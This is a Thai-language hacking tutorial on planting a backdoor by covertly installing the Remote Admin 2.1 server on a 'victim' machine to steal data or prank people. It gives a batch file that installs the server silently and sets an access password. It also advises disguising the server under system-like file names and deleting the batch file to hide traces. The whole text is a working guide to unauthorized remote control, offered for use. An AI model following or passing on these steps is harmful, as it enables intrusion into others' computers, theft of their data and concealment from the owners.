การสร้าง Back doors

การสร้างประตูลับ 


(Back doors)

โหลดโปรแกรม ตามลิ้งค์นี้ก่อน
ผมเชื่อได้ว่า หัวข้อนี้ หลายๆคนคงชอบมาก เพราะจะเป็นการลงโปรแกรม Trojan Backdoor Remote ต่างๆไปที่เครื่องเหยื่อ เพื่อที่คุณจะได้มีโอกาสกลับมาขโมยข้อมูลใหม่ หรืออาจทำเพียงแค่แกล้งคนเล่นสนุกๆเท่านั้น เรามาลองดูกันว่าเค้ามีวิธีติดตั้งกันอย่างไรบ้าง ในตัวอย่างที่ผมจะแนะนำนั้น ผมขอยกตัวอย่างมา 1 โปรแกรมนะครับ Remote Admin 2.1 สำหรับผู้ที่ถนัดโปรแกรมอื่นผมก็ไม่ว่าอะไร เพราะคุณอาจใช้แนวทางที่ผมสอนมาประยุกต์ใช้ไปด้วยได้เลย

หลักสำคัญในการใช้โปรแกรม

ส่วนโปรแกรมอื่นๆที่เป็นโปรแกรม Backdoor and Trojan นั้นเวลาคุณจะเข้าไปควบคุมเครื่องเหยื่อ คุณจะต้องส่งไฟล์ ที่มีชื่อประมาณว่า "server หรือ srv" ประมาณนี้ครับ เพราะว่าจะเป็นตัวทำให้เครื่องเหยื่อ รอการ Connect จากเครื่อง Cliend เครื่องของคุณนั่นเอง และไฟล์ server ต่างๆคุณสามารถที่จะเปลี่ยนให้เป็นชื่ออื่นๆได้ วิธีที่เนียนที่สดคุณอาจเปลี่ยนชื่อไฟล์ server เหล่านี้ให้เป็นชื่อคล้ายๆไฟล์ระบบ เช่น NTSys Notepads เหอๆ ลองจินตนาการเอาเองนะ

Remote Admin 2.1

ที่ผมแนะนำโปรแกรมนี้เหตุผลคือ

-โปรแกรมนี้สามารถติดตั้งบนดอสได้ ลองคิดดูว่า ถ้าเป็นเครื่องอื่นๆใน Internet คุณไม่สามารถไปนั่งหน้าเครื่องได้ ลองคิดดูโปรแกรมส่วนใหญ่แล้วเวลาติดตั้งมักจะมีหน้าต่างให้คลิก Next ไปเรื่อยๆ(แล้วจะติดตั้งยังไงคิดดู) แต่โปรแกรมนี้เด็ด การไปติดตั้งเครื่องเหยื่อนั้น เนียนสุดๆ

-โปรแกรมนี้มีขนาดไฟล์ที่เล็กกระทัดรัด สามารถใส่แผ่น 3 นิ้วได้อย่างสบาย และใช้เวลาติดตั้งเพียง 10 วินาที (อันนี้รวมการก็อบไฟล์ลงเครื่องด้วยนะ) และติดตั้งด้วยการ ดับเบิ้ลคลิกแค่ครั้งเดียว จ๊าบบบ..

ก่อนอื่นให้คุณติดตั้งโปรแกรมให้เสร็จก่อนนะครับ เพราะส่วนนี้มันไม่ยากเกินความสามารถของทุกคนอยู่แล้วผมเชื่อ และถ้าคิดว่ากลัวใช้ไม่เป็น ลองไปอ่านดูได้ที่นี่ครับ

http://www.xirbit.com/html/programs/radmin/index.shtml

จากนั้นให้ไปที่โฟล์เดอร์ของโปรแกรมนะครับ แล้วคุณจะเห็นไฟล์อยู่ 2 ตัวที่จะเอาไปใช้ในเครื่องเหยื่อ คือ r_server.exe and AdmDll.dll ซึ่ง 2 ไฟล์นี้ต้องอยู่ด้วยกันในเครื่องเหยื่อนะครับ จะเอาไปใส่ที่ไหนก็ได้

ออกแรงกันหน่อยนะ ต่อไปต้องเขียน bat file ที่คุณต้องสร้างขึ้นเองโดนการเปิด Notepad ขึ้นมาเขียนตามนี้


r_server /install

r_server /pass: 123456 /save

ตรงตัวเลข 123456 ที่เป็นสีแดง ให้คุณเปลี่ยนเป็นตัวอะไรก็ได้ มันจะเป็น password เอาไว้เข้าไปควบคุมเครื่องเป้าหมาย ต้องจำให้ได้นะครับ เพราะว่าก่อนคุณจะเข้าไปควบคุมเครื่องที่คุณได้ติดตั้งไฟล์ r_server คุณจะต้องใส่ password ที่คุณได้ตั้ง ซึ่งในตัวอย่างที่ผมได้ทำ password เป็น 123456 ถ้าดันลืมไม่งั้นต้องทำ batfile ส่งไปใหม่

จะเห็นว่ารูปข้างบน นั้นผมได้ทำคำสั่ง del radmin.bat เพราะว่าหลังจากที่ผมเขียนคำสั่งด้านบนเสร็จแล้ว ผมจะเซฟเป็นชื่อ radmin.bat เพราะว่าหลังจากรันคำสั่งติดตั้งต่างๆแล้ว ให้ลบไฟล์ที่พิมพ์นี้ทิ้งไป เพื่อปกปิดร่องรอย ต้องระบุนามสกุลเป็น .bat อย่าลืมนะครับเวลา save จากนั้นคุณก็เอาไฟล์นี้ไปไว้กับ 2 ไฟล์ รูปด้านบนคือไฟล์ r_server.exe กับ AdmDll.dll และ radmin.bat ที่สร้างมาสดๆรวมเป็น 3 ไฟล์ เอาไว้ที่เครื่องเป้าหมาย โดยการส่งทางใดก็ได้ (ต้องเอาไว้ที่เดียวกัน) ตามวิธีที่ผมได้สอน hack จากเรื่องอื่น โดยต้องรันที่เครื่องเป้าหมายนะ โดยเรียกไฟล์ radmin.bat ที่เครื่องเป้าหมาย (ขโมย ดอสฝั่งเครื่องเหยื่อมาก่อน)ไม่ใช่เครื่องคุณเอง แล้วหลังจาก restart เครื่องเป้าหมาย คุณก็สามารถคุมได้เลย สังเกตบรรทัดสุดท้าย เป็นการลบไฟล์ radmin.bat นี้ทิ้งไปด้วย ป้องกันเผื่อเหยื่อเปิดอ่านดูไฟล์ (เวลาเรียกไฟล์ radmin.bat ขึ้นมาดูหรือแก้ไข ให้คลิกขวาที่ไฟล์นะครับ เลือก edit ) ถ้าดับเบิ้ลคลิกจะเป็นการเรียกโปรแกรม


จากนั้นก็รอเวลาให้เหยื่อ restart เครื่องแล้วมาต่อเน็ตใหม่ เพียงเท่านี้ คุณก็สามารถควบคุมเครื่องเหยื่อได้ตามต้องการ